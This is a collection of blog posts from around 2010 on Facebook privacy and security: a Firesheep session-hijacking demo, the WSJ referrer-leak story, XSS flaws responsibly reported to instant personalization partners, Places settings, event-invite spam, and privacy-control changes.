Why Should the CSO Care About an Employee’s Personal Social Media Account?

Thank you to Tom for allowing me to participate with social media security dot com. The guys in this community have been great resources in helping me to spread the word on the insecurities with social media. This year, I have been reaching beyond the security space, speaking to many social media clubs, podcampers and O’Reilly conferences only to realize something disheartening. Not enough people hear or are listening to us! I am going to start posting some real experiences to help with the questions of “why should I care about social media security?”

This week at Podcampnashville I was able to demo firesheep and in 3 mins and 48 secs, 64 accounts were in my sidebar waiting for me to double click. After the demo I had some great questions and just like that the session was over.  Later a young lady came to me and admitted she was 1 of the 64 in the sidebar. She asked me to show her what I “could” of done with her account. She was not really impressed or scared that I could of updated the profile, chat with friends or add creepy users.  Then fear came very quickly when I changed from the user account to the PAGES she had admin rights.

She is in charge of the facebook pages of 12 major medical practices in the area. I have to be honest she rocked at maintaining these pages. Impressed by her work, I asked how long she had into these pages and followers. Time was in the 1000’s of hours and also in the $100,000 range of billable time.  My final question to her was…what would she do if all of this time and money came crashing down by some idiot at a camp running a free Moz Plug-in. She said she would hunt them down. She was kidding of course but I was a little scared to be honest. We went over some settings and she is now going to help spread the word. 1 out of 64 down.

Facebook Pages security is basically in the hands of the personal accounts of the admins.  This is one reason why the CSO should care…

Things that make you go HMMMM? <- point to head -Arsenio Hall
Facebook terms and conditions state that you have to have a personal Facebook account to administrate your company page. Facebook company pages allow multiple users to have access to share content.  Are you monitoring or making sure the people with access is meeting your company security standards? If an employee has left, is Facebook Page access part of the account removal process?

Looking at Facebook’s Strategy and Possible New Directions

Over the last few months, Facebook has rolled out several significant new features, such as Places and the updated Groups. On Monday, Facebook is holding another event to announce what many expect to be an improved messaging feature. As I’ve watched these changes, I’ve been thinking about where Facebook might be headed.

At first, I started to think Facebook was simply looking to extend its reach by acting as an invisible layer of sorts. Anil Dash once talked about Facebook melting into the larger Web, but perhaps Facebook would end up becoming part of the underlying fabric of the Internet. In past public appearances, Facebook CEO Mark Zuckerberg seemed to be the kind of person who was content to remain in the background, and the company’s strategy seemed to reflect a similar style. I’ve mentioned before the idea of Facebook becoming and identity layer on the Internet, and innovations such as their Graph API have made it easier than ever for sites to integrate with Facebook.

But Facebook’s updated Groups feature changed my perspective, since it added functionality that would drive users back to facebook.com. Of course, the upgrade did enable e-mail as a way of interacting with groups. In some ways, Facebook’s overall strategy could be compared to Google’s. Years ago, many sites focused on “stickiness,” trying to keep users hooked. By contrast, Google drove users away by providing relevant links to other sites. But to see Google as non-sticky would be an oversimplification. In fact, the company built a successful ad network that extended its reach across the web. Also, Google has created a number of other products that many people stay logged into, such as Gmail.

And now, people are expecting Facebook to announce a web-based e-mail client that will compete with Gmail. I’m predicting that Facebook will roll out a new messaging system, but it won’t be a Gmail clone or simply another client for managing traditional POP/IMAP e-mail. That’s not to say there won’t be any e-mail gateway, but I think Facebook’s plans will go much further. I’m guessing that at least part of the new system will involve somehow extending private messaging features across Facebook-integrated websites.

In any event, I think Facebook’s announcement will include at least a few surprises for those who have been discussing the possibilities. Facebook has a history of introducing features that aren’t quite what people expected – and often end up leading to practical implementations of ideas that were previously niche experiments. Personally, I think it’s a bit short-sighted to think that Facebook would simply join the market for web-based e-mail without trying to reinvent it, especially given the service’s cautiousness about past features that allowed or potentially allowed spam-like behaviors.

Facebook has also been accused many times of somehow standing in opposition to “openness.” Personally, I think the term has become a buzzword that’s often used without much specificity. And even though I’ve often been a critic of Facebook, I do think many of the accusations aren’t entirely fair. From RSS feeds to developer APIs, Facebook has opened up data in ways that many other sites can’t claim. Today’s Facebook is certainly far more “open” that years ago – in fact, I would argue that the site has at times been too open lately, such as when some user data became reclassified as “publicly available” last fall. But regardless of Facebook’s degree of openness, the company has always been careful to maintain a high degree of control over information and features on the site. This can be positive, such as quickly removing malware links, or negative, such as controversial decisions to bar users or certain content.

Either way, that control has helped the site build a powerful database of profiles that generally reflects real people and real relationships. That’s part of what fascinated me about the site’s recent spat with Google over contact information. In the past, a list of e-mail addresses was about the only semi-reliable way to identify a group of people across the Internet. Now, many sites rely on Facebook’s social graph for that function. In terms of identity, the value of e-mail addresses has declined, and I don’t think exporting them from Facebook would provide as much value as Google might think. On the other hand, Google may realize this and be so concerned about the shift that they’re trying to curb Facebook’s influence. This would especially make sense if Google intends to introduce a more comprehensive social networking product that would need e-mail addresses as a starting point. Regardless, I’m sure Google feels threatened by the prospect of Facebook providing a better alternative to traditional e-mail – a change that would only bolster the value of a Facebook profile as the primary way to identify a typical Internet user.

Thoughts on the Wall Street Journal’s Facebook Investigation

A front-page story in last Monday’s Wall Street Journal declared a “privacy breach” of Facebook information based on an investigation conducted by the paper. The Journal found that third-party applications using the Facebook Platform were leaking users’ Facebook IDs to other companies, such as advertising networks.

The report generated controversy across the Web, and some reactions were strongly negative. On TechCrunch, Michael Arrington dismissed the article as alarmist and overblown. Forbes’ Kashmir Hill surveyed other responses, including a conversation on Twitter between Jeff Jarvis and Henry Blodget, and expressed skepticism over the Journal’s tone.

I’ve been a bit surprised by the degree to which some have written off the Journal’s coverage. Some may disagree with the label of “privacy breach,” but I thought the report laid out the issues well and did not paint the problem as a conspiracy on the part of Facebook or application developers. Either way, I’m glad to see that the article has sparked renewed conversation about shortcomings of web applications and databases of information about web users. Also, many may not realize that information leakage on the Facebook Platform has historically been even worse.

Information leakage via a referrer is not a new problem and can certainly affect other websites. But that doesn’t lessen the significance of the behavior observed in the WSJ investigation. Privacy policies are nearly always careful to note that a service does not transfer personally identifiable information to third parties without consent. Online advertising networks often stress the anonymity of their tracking and data collection. The behavior of Facebook applications, even if unintentional, violated the spirit of such statements and the letter of Facebook’s own policies.

Some people downplayed the repercussions of such a scenario on the basis that it did not lead to any “private” profile information being transferred to advertisers – a point Facebook was quick to stress. Yet when did that become the bar for our concept of acceptable online privacy? Should other services stop worrying about anonymizing data or identifying users, since now we should only be concerned about “private” content instead of personally identifiable information? Furthermore, keep in mind that Facebook gets to define what’s considered private information in this situation – and that definition has changed over the last few years. At one time in the not-too-distant past, even a user’s name and picture could be classified as private.

Many reactions have noted that a Facebook user’s name and picture are already considered public information, easily accessed via Facebook’s APIs. Or as a Facebook spokesmen put it, “I don’t see from a logic standpoint how information available to anyone in the world with an Internet connection can even be ‘breached.’” But this argument fails to address the real problem with leaked IDs in the referrer. The issue was not simply what data applications were leaking, but when and how that data was leaked. The problem was not that advertisers could theoretically figure out your name given an ID number – it’s that they were given a specific ID number at the moment a user accessed a particular page. Essentially, advertisers and tracking networks were able to act as if they were part of Facebook’s instant personalization program. Ads could have theoretically greeted users by name – the provider could connect a specific visit with a specific person.

Interestingly enough, many past advertisements in Facebook applications did greet users by name. Some ads also including names and pictures of friends. Facebook took steps several times to quell controversies that arose from such tactics, but I’m not sure many people understood the technical details that enabled such ads. Rather than simply leak a user’s ID, applications were actually passing a value called the session secret to scripts for third-party ad networks.

With a session secret, such networks could (and often did) make requests to the Facebook API for private profile information of both the user and their friends, or even private content, such as photos. Typically, this information was processed client-side and used to dynamically generate advertisements. But no technical limitations prevented ad networks from modifying their code to retrieve the information. In fact, a number of advertisements did send back certain details, such as age or gender.

Change to the Facebook Platform, such as the introduction of OAuth earlier this year, have led to the deprecation of session secrets and removed this particular problem. I’m not sure how much this sort of information leakage or similar security problems motivated the changes, but problems with session secrets certainly persisted quite a while prior to them. If the WSJ had conducted their study a year ago, the results could have been even more worrying.

Still, I’m glad that the Journal’s research has led many to look more closely at the issues they raised. First, the story has drawn attention to more general problems with web applications. Remember, the Web was originally designed for accessing static pages of primarily textual information, not the sort of complex programs found in browsers today. (HTML 2.0 didn’t even have a script tag.) Data leaking via referrers or a page’s scripts all having the same scope are problems that go beyond Facebook apps and will likely lead to more difficulties in the future if not addressed.

Second, people are now investigating silos of information collected about website visitors, such as RapLeaf’s extensive database. Several responses to the Journal piece noted that many such collections of data provide far more detail on web users and are worthy of greater attention. I agree that they deserve scrutiny, and now reporters at the Journal seem to be helping in that regard as well.

We’ve entered an age where we can do things never previously possible. Such opportunities can be exciting and clearly positive, but others could bring unintended consequences. I think the availability and depth of information about people now being gathered and analyzed falls into the latter category. Perhaps we will soon live in a world where hardly any bit of data is truly private, or perhaps we will reach a more open world through increased sharing of content. But I think it well worth our time to stop and think about the ramifications of technological developments before we simply forge ahead with them.

Over the last few years, I’ve tried to bring attention to some of the issues relating to the information Facebook collects and uses. They’re certainly not the only privacy issues relevant to today’s Internet users, and they may not be the most important. But I think they do matter, and as Facebook grows, their importance may increase. Similarly, I think it wrong to dismiss the Journal’s investigation as “complete rubbish,” and I look forward to the rest of the dialogue they’ve now generated.

Instant Personalization Program Gets New Partner, Security Issue

Facebook announced last week that movie information site Rotten Tomatoes would join Docs.com, Pandora, and Yelp as a partner in the social networking service’s “instant personalization” program. Rotten Tomatoes will now be able to automatically identify and access public information for visitors logged in to Facebook, unless those users have opted out of the program. This marks the first new partner since Facebook launched the feature earlier this year.

Soon after that initial roll-out, security researchers noted vulnerabilities on Yelp’s website that allowed an attacker to craft pages which would hijack Yelp’s credentials and gain the same level of access to user data. TechCrunch writer Jason Kincaid reported on the cross-site scripting (XSS) holes, and made this prediction: “I suspect we’ll see similar exploits on Facebook partner sites in the future.”

Kincaid’s suspicions have now been confirmed, as the latest site with instant personalization also had an exploitable XSS vulnerability, which has now been patched. I’ll quickly add that Flixster, the company behind Rotten Tomatoes, has always been very responsive when I’ve contacted them about security issues. They have assured me that they have done XSS testing and prevention, which is more than could be said for many web developers. In posting about this issue, I primarily want to illustrate a larger point about web security.

When I heard about the expansion of instant personalization, I took a look at Rotten Tomatoes to see if any XSS problems might arise. I found one report of an old hole, but it appeared to be patched. After browsing around for a bit, though, I discovered a way I could insert some text into certain pages. At first it appeared that the site properly escaped any characters which could lead to an exploit. But ironically enough, certain unfiltered characters affected a third-party script used by the site in such a way that one could then execute arbitrary scripts. Since I had not seen this hole documented anywhere, I reported it to Rotten Tomatoes, and they promptly worked to fix it.

I’ve long argued that as more sites integrate with Facebook in more ways, we’ll see this type of problem become more common. Vulnerable applications built on the Facebook Platform provided new avenues for accessing and hijacking user accounts; now external websites that connect to Facebook open more possible security issues. As Kincaid noted in May, “Given how common XSS vulnerabilities are, if Facebook expands the program we can likely expect similar exploits. It’s also worth pointing out that some large sites with many Facebook Connect users – like Farmville.com or CNN – could also be susceptible to similar security problems. In short, the system just isn’t very secure.”

Overcoming such weaknesses is not a trivial matter, though, especially given the current architecture of how scripts are handled in a web page. Currently, any included script has essentially the same level of access and control as any other script on the page, including malicious code injected via an XSS vulnerability. If a site uses instant personalization, injected scripts can access the data used by Facebook’s code to enable social features. That’s not Facebook’s fault, and it would be difficult to avoid in any single sign-on infrastructure.

Of course, all of this applies to scripts intentionally included in the page as well, such as ad networks. With the Rotten Tomatoes roll-out, Facebook made clear that “User data is never transferred to ad networks.” Also, “Partner sites follow clear product/security/privacy guidelines,” and I assume Facebook is monitoring their usage. I’m not disputing any of these claims – Facebook is quite correct that advertisers are not getting user data.

But that’s due to policy limitations, not technical restrictions. Rotten Tomatoes includes a number of scripts from external sources for displaying ads or providing various functions. Any of these scripts could theoretically access a Facebook user’s information, though it would almost certainly be removed in short order. I did find it interesting that an external link-sharing widget on the site builds an array of links on the page, including the link to a user’s Facebook profile. This happens client-side, though, and the data is never actually transferred to another server.

I bring up these aspects simply to note the technical challenges involved in this sort of federated system. I think it’s very possible that we will eventually see ad network code on a Facebook-integrated site that tries to load available user data. After all, I’ve observed that behavior in many Facebook applications over the last few years – even after Facebook issued explicit policies against such hijacking.

These dangers are part of the reason why JavaScript guru Douglas Crockford has declared security to be the number one problem with the World Wide Web today. Crockford has even advocated that we halt HTML5 development and focus on improving security in the browser first. While that won’t likely happen, I think Crockford’s concerns are justified and that many web developers have yet to realize how dangerous cross-site scripting can be. Perhaps these issues with instant personalization sites will help increase awareness and understanding of the threat.

Postscript: This morning, an XSS vulnerability on Twitter led to script-based worms (somewhat reminiscent of “samy is my hero”) and general havoc across the site. This particular incident was not related to any mashups, but once again emphasizes the real-world security ramifications of cross-site scripting in a world of mainstream web applications.

Update (Sep. 27): Today news broke that Scribd had also become part of Facebook’s Instant Personalization program. I took a look at the site and discovered within minutes that it has a quite trivial XSS vulnerability. This particular issue should have been obvious given even a basic understanding of application security. It also indicates that Facebook is not doing much to evaluate the security of new instant personalization partners. Update 2: Scribd patched the most obvious XSS issue right about the time I updated this post: entering HTML into the search box brought up a page that loaded it unfiltered. Another search issue remained, however: starting with a closing script tag would still affect code later in the results page. After about half an hour, that problem was also patched. I’m glad Scribd moved so quickly to fix these problems, but I still find it disconcerting they were there to start with. I’ve not done any further checking for other XSS issues.

Facebook Privacy & Security Guide Updated to v2.3

Just a quick post that I have updated the Facebook Privacy & Security Guide to include information on configuring the privacy settings for Facebook Places.  You can find this on the first page under “Sharing on Facebook”.  Stay tuned for more information on Facebook Places in the next day or so!

Download the updated Facebook Privacy & Security Guide here (pdf download).

Facebook Places Brings Simple Location Sharing to the Masses

Yesterday, Facebook announced a much-anticipated feature that allows users to easily post their current location on the site. The new setup, known as Facebook Places, works much like other location-based services, such as Foursquare or Gowalla, by letting users “check in” at nearby places. Geolocation providers, such as a mobile phone’s GPS, pinpoint the user, and Localeze provides the initial database of places. Eventually, users will be able to add their own locations to the Facebook map. Inside Facebook has a run-down of the overall functionality.

Facebook also allows your friends to check you in at locations, and these check-ins are indistinguishable from ones you made for yourself. In typical opt-out fashion, you can disable these check-ins via your privacy settings, and you’ll be asked about allowing them the first time a friend checks you in somewhere.

Even if you stop friends from checking you in to places, however, they can still tag you with their check-ins, similar to how friends can tag you in photos or status updates. Such tags will appear on your wall, as tagged status updates do now. You’ll be able to remove tags after the fact, but it doesn’t seem that you’ll be able to prevent friends from tagging you altogether.

Applications have two new permissions related to places. One gives access to your check-ins, the other gives access to your friends’ check-ins as well. Both will appear in the list of requested permissions when you authorize an application, and they are required for API access to check-ins. If your friends grant an application access to friends’ check-ins, you can prevent yours from appearing via “Applications and Websites” privacy controls.

API access is currently read-only – authorized applications can access your check-ins, but can’t submit check-ins to Facebook. That sort of functionality is currently in closed testing, though.

ReadWriteWeb has a nice guide to applicable privacy settings. When these controls first appeared on my profile, Facebook set the visibility for all my check-ins to “Friends Only” by default and disabled API access to my check-ins via friends by default. But they also enabled by default another setting which makes individual check-ins visible to anyone nearby at the time, whether friends or not. The option for letting friends check me in was not specifically set, but apparently I would have been prompted the first time a friend checked me in.

According to Facebook, you will only be able to check-in at locations near where you are, as determined by the geolocation feature of your browser (or your phone’s GPS for the iPhone app). I’m a bit suspicious on how difficult faking a check-in will be, but I don’t yet have the ability to test that out.

Facebook’s initial geolocation rollout brings a fairly modest feature set, but when integrated with Facebook Pages and made available to a network of 500 million people, the service offers great potential. As with other recent changes, adding check-ins reduces friction for users to share their location and provides Facebook with another valuable set of data about people’s daily activities. It remains to be seen whether users will react with discomfort over the potential for an entirely new meaning of “Facebook stalking” or with excitement over potential new product offerings. Either way, the amount and variety of information under Facebook’s control continues to expand rapidly.

Spam via Facebook Events Highlights Ongoing Challenges

Earlier today, I received an invitation to a Facebook event from “Giovanna” – someone I’d never heard of and certainly never added as a friend. The invite came as a bit of a surprise, since my profile was fairly locked down. While anyone could search for it, all profile information was set to “Friends Only,” and sending messages or making friend requests was limited to “Friends of Friends.” None of my friends seem to know Giovanna, and her profile is probably fake anyway.

The event title proclaimed “iPhone Testers Needed!” and might be enticing to users who want an iPhone. While the event page included more information on the supposed testing program, the invite was followed by a message from the event creator. Once you’re on the guest list for a Facebook event, the event administrators can send out Facebook messages you’ll receive, regardless of privacy settings. This particular message (which also arrived in my e-mail inbox due to notifications settings) included a link to the iPhone opportunity, which unsurprisingly was a typical “offer” page that required me to submit personal information and try out some service before I could get my fancy new phone.

I began investigating how this all happened. When you create a Facebook event and try to invite people, you’ll only see a list of your friends to choose from. But it turns out that on the backend, nothing prevents you from submitting requests directly to Facebook with other people’s Facebook IDs. In my testing, I’ve been able to send event invitations to other users even if we’re not friends and they have tight privacy settings. I’m guessing that using this technique to invite more than a few people could raise a spam alert, but I’m not sure. Also, an event invitation does not give the event creator increased access to any profile information of guests, but as already noted, it does let event administrators send messages to people they might otherwise not be able to contact.

I’m sure Facebook will take action soon to clamp down on this particular loophole, so I think it unlikely we’ll see it exploited too widely. (The iPhone testing event currently has around 1800 guests – significant, but tiny compared to other Facebook scams.) But it does demonstrate the sort of challenges Facebook is having to handle as their network and power expand. Several years ago, when the site was used for little besides keeping in touch with college classmates and other offline friends, Facebook was seen as mostly spam-free, in contrast to services like Myspace. Now that applications, social gaming friends, and corporate brands have all become integral parts of the Facebook experience, black hat marketers keep finding new ways to spread links among users. And worse, those tricks can often be used to spread malware as well.

I do think that Facebook wants to avoid annoying users with spam, and works to prevent your inbox on the site from becoming as flooded as a typical e-mail account. But a network of 500 million people presents a very enticing target, and we’ll keep seeing new scam ideas pop up as Facebook expands and adds features. In the mean time, continue to be wary of any links  promising a glamorous reward for free.

Facebook Backtracks on Privacy Controls and Public Information

Facebook CEO Mark Zuckerberg held a press conference today announcing significant changes to the site’s privacy settings. The latest updates come after weeks of debate and criticism over Facebook’s handling of user information. Though it may take several days or weeks to roll out the new controls, an official privacy guide provides a summary of how they work. Full details are still rolling in, but certain aspects are already clear.

First, the new interface for making many changes appears to be much more streamlined. This should be a welcome change to those confused by the previous litany of options. The primary privacy page displays a table with columns for “Everyone,” “Friends of Friends,” and “Friends Only,” with rows for several categories of content. This table not only establishes settings for certain bits of profile information; it also lets users set defaults for new content shared.

Second, Facebook has removed the requirement that “connections,” such as your list of friends and the pages you “like,” always be publicly available information. A secondary page will provide access controls for certain groups of these connections, as well as who can friend you, send you messages, or see your profile in search results.

Third, users will have new options related to third-party applications that integrate with Facebook. The company had previously announced a granular permissions model for applications, and developers are in the process of transitioning to the new setup. Those permissions will now be reflected in the privacy settings, though how that will look is not yet clear. (Also, Facebook’s privacy guide assures users that applications can only request “information that’s needed for them to work,” but that’s up to developers.) Facebook is also re-instating an option to completely opt-out from the Facebook Platform. This setting had been available prior to changes last fall. However, it now appears that this opt-out will also be the only way to avoid public content being indexed by search engines.

Zuckerberg promised an “easy” way to opt-out of the controversial instant personalization program, which lets certain third-party websites automatically identify Facebook visitors, but the feature remains opt-out. Many of the other privacy settings are also still opt-out in that the site defaults appear to remain the same, presented as “Recommended” when a new user checks them.

I’ve been concerned about the tone of some Facebook responses to recent privacy concerns, and today’s presentation by Zuckerberg was no exception. He noted that the company had not seen any noticeable impact on site usage lately, and according to one report commented, “Perhaps the personal privacy preferences of liberal advocacy groups and DC politicians don’t match with those of the general public.” That may be true, though I think politicians or privacy advocates have a deeper understanding of recent changes than the general public. Still, this sort of remark comes across as at best somewhat irritated and at worst rather arrogant. It also probably won’t win over any liberal advocacy groups or DC politicians. (For the record, I don’t fall into either category.)

Other aspects of the announcements lead me to wonder how much Facebook truly understands the rising worries over the site’s handling of privacy issues.  Zuckerberg emphasized the site’s focus on sharing, that users want to share, and his belief that people want to share more openly. The default privacy options clearly reflect this belief, positioning Facebook as a site generally intended for public sharing.

But I think Zuckerberg is confusing the desire to share easily or freely and the desire to share publicly. Several researchers have explored how people approach privacy, and people constantly use services such as Facebook to post content they would not want distributed to the entire Internet. We’ve become accustomed to the idea of being private in public, since our offline conversations in public settings are not recorded and indexed for anyone to search. What would be the harm to users if content was private by default, but could be opened to the public if the author wanted that? After all, this is how Facebook operated for the first few years of its existence – and it likely played a significant role in the site’s growth.

Of course, while an opt-in approach may help many users, Facebook wants users to share more openly. More public content provides more value for other services that might integrate with Facebook, extending the site’s reach and influence. That’s part of why I find it difficult to simply accept Zuckerberg’s notion that most people are moving towards public sharing on their own: regardless of what individuals think, Facebook itself certainly has an opinion on how much you should share.

And that’s the real question – how much you share, not whether you share. I’ve never been opposed to making it easier for users to share content. But I do have a problem when a site that was built on sharing with a limited audience reorganizes to make that same type of sharing more difficult than fully public sharing – an activity that carries far more potential dangers, both social and otherwise.

Facebook has built an unprecedented audience of users who give it significant trust. I’m glad to see the company making welcome changes which assist users who actively care about privacy controls. But I remain concerned that the company’s overall perspective still reflects questionable ideas, such as the notion most people are not concerned about privacy, and either fails to recognize the company’s role as a trend-setter or ingenuously downplays it. That’s not a personal attack on Zuckerberg, whom I’ve never met, or anyone else at Facebook. It’s simply my evaluation of the service’s direction based on recent features and public relations. And I think Facebook owes its users much better.

1 2 3 4 12